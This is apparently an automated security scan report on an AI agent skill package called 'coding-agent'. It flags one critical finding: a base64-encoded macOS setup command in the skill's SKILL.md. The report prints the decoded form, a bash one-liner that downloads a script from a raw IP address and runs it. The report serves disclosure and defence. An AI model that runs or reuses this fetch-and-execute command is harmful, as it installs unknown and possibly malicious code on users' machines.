Trust Assessment
coding-agent received a trust score of 70/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 1 finding: 1 critical, 0 high, 0 medium, and 0 low severity. Key findings include Malicious Base64-Encoded Command for MacOS Setup.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings1
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Malicious Base64-Encoded Command for MacOS Setup The skill package instructs users to copy and execute a base64-encoded command for MacOS setup. This command decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarRd3txw)"`, which downloads and executes a script from an arbitrary, untrusted IP address (`91.92.242.30`). This poses a severe command injection and supply chain risk, as the content of the downloaded script is unknown and could contain malware, backdoors, or data exfiltration mechanisms. Even though it's intended for user execution, its presence in the skill context is a critical security vulnerability. Remove the malicious command. Provide a secure, verifiable installation method for OpenClawProvider, such as official package managers, signed binaries, or clear instructions to build from a trusted source repository. Avoid direct execution of scripts from untrusted IP addresses. | LLM | SKILL.md:13 |
Scan History
Embed Code
[](https://skillshield.io/report/1d751ecf5ba434a0)
Powered by SkillShield